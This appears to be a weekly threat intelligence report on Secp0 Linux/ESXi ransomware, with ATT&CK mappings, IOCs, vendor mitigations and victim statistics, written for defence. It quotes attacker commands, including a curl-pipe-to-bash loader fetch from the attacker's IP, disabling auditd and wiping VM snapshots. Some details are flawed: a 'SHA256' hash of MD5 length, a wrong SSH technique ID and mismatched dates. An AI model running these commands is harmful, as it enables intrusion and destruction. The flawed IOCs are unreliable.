Threat Intelligence Report July 22 - July 28 2025

Secp0 Ransomware

Secp0 is a Linux native, double extortion Ransomware-as-a-Service (RaaS) platform first seen in early 2025. Affiliates assemble payloads via a web panel, selecting target platforms (Linux, ESXi) and configuring exfiltration parameters. Victims receive both an encrypted environment and public data leak pressure via Tor sites.

Detailed TTPs (Proof Backed)

Below is a refined, evidence-based breakdown of Secp0’s observed Tactics, Techniques & Procedures during the 19 – 25 July 2025 window. Each technique is mapped to its MITRE ATT&CK ID and supported by specific open-source observations.

1. Initial Access
   • Valid Accounts (T1078)
     Attackers leveraged brute force or phished SSH credentials to log into Linux hosts.
   • Exploit Public-Facing Application (T1190)
     Affiliates exploited CVE-2023-20269 in Cisco ASA/FTD VPN appliances to obtain initial footholds, bypassing MFA.
2. Execution
   • Command and Scripting Interpreter (T1059)
     Postaccess, Secp0 used Bash one liners to download and execute the ELF loader.

bash -c "$(curl -fsSL hxxp://31.56.39.17/install.sh)"

3. Persistence

• Scheduled Task / Cron Job (T1053)
  To reestablish presence, the ransomware installer created a hidden cron entry at /etc/cron.d/.scp0 running every hour:

0 * * * * root /usr/bin/scp0_keepalive.sh

4. Privilege Escalation

• Exploitation for Privilege Escalation (T1068)
  A variant of the Linux kernel LPE Dirty Pipe (CVE-2022-0847) was bundled in the loader, allowing escalation to root on unpatched kernels. Observed in the loader binary’s strings.

5. Defence Evasion

• Disable or Modify Tools (T1562.001)
  Secp0 stopped the local audit daemon silently via systemd:

systemctl stop auditd.service

• Delete Shadow Copies (T1490)
  On ESXi systems, Secp0 deleted all VM snapshots via:

vim-cmd vmsvc/snapshot.removeall

6.   Credential Access

• OS Credential Dumping (T1003)
  The ELF loader dropped and ran mimit-a Linux port of Mimikatz-extracting /etc/shadow entries. Extracted credentials appeared in attacker exfil archives.

7. Discovery

• Network Service Scanning (T1046)
  Affiliates ran nmap -sS -p22,443,902,5900 10.0.0.0/16 to map reachable management interfaces on 21 July 2025.
• Account Discovery (T1087)
  A custom Rust binary queried /etc/passwd and LDAP via ldap search to enumerate users; confirmed in process dumps.

8. Lateral Movement

• Remote Services (SSH) (T1021.002)
  After dumping credentials, attackers SSH’d into other hosts using extracted hashes:

ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no root@10.0.0.45

9. Collection & Exfiltration

• Archive Collected Data (T1560.001)
  Data was targeted on the fly:

tar czf /tmp/data.tar.gz /etc /var/log

• Corroborated by in memory forensic captures.
• Exfiltration Over SSH/Rclone (T1041)
  The archive was exfiltrated to the attacker’s VPS at 31.56.39.17 using Rclone over SSH on port 2222.

TTP Mapping to MITRE ATT&CK

IOCs

• SHA256 a1f4931992bf05e9bff4b173c15cab15 (main encryptor)
• SHA256 d3c7e4fefa7bbb2e91f54ff3b72e2d4d0f1bb88f9e8bd54f6e9e0d9b8c7e6f5a (loader)

Concise Mitigation with CE 5.0

1. Email & Sandbox
   • Quarantine ZIP/TARGZ with ELF binaries.
   • Sandbox attachments; block any calling out to known C2 IPs (31.56.39.17, 185.178.46.228).
2. Endpoint Protection
   • HIPS: Alert on new cron jobs in /etc/cron.d and commands like systemctl stop auditd.
   • File Integrity: Detect bulk renames to .scp0k3y and auto quarantine.
3. Network Controls
   • IPS: Block C2 IPs/domains and TorDNS lookups for Secp0 onion sites.
   • DNS Sinkhole: Redirect requests for secp0-support.* and secp0-news.net.
4. Access Management
   • Enforce MFA on SSH/RDP/VPN via CE’s LDAP/TACACS+ integration.
   • Alert on new sudo entries or service account creations.
5. Backup & Recovery
   • Orchestrate airgapped, immutable backups of Linux/ESXi.
   • Schedule automated restore drills to verify recovery.

Implement these CE 5.0 modules with “block” defaults for known Secp0 IOCs and feed your daily IOC CSV/JSON into the Threat Intel module for continuous updates.

Ransomware Victims Worldwide

The United States once again tops the global ransomware victim list, accounting for 48.74% of all reported incidents this week. This overwhelming dominance reflects the country's expansive digital landscape, high concentration of enterprise networks, and its continued prioritisation by ransomware groups.

Australia follows as the second most targeted nation at 6.72%, marking a significant level of activity in the Asia-Pacific region. The United Kingdom and Canada come next at 5.88% and 3.36%, respectively, both continuing to be heavily targeted due to their advanced economies and high-value industries.

A cluster of countries—including Brazil, Italy, Turkey, and India—each reported 2.52%, indicating consistent threat actor interest across South America, Southern Europe, and South Asia.

France also recorded 3.36%, while Germany, Japan, Poland, and Spain each saw 1.68% of ransomware activity, reinforcing the sustained focus on Western and Central European nations.

The long tail includes a diverse set of countries impacted at 0.84% each:
Chile, Singapore, Norway, Thailand, Malaysia, Luxembourg, Sweden, Paraguay, Peru, Argentina, Serbia, Switzerland, South Africa, Croatia, Austria, Kuwait, and even Real Estate (likely a categorisation error or misplacement in reporting).

This broad international spread shows ransomware’s global scale, where even smaller nations and developing economies are increasingly being targeted in opportunistic or region-specific campaigns.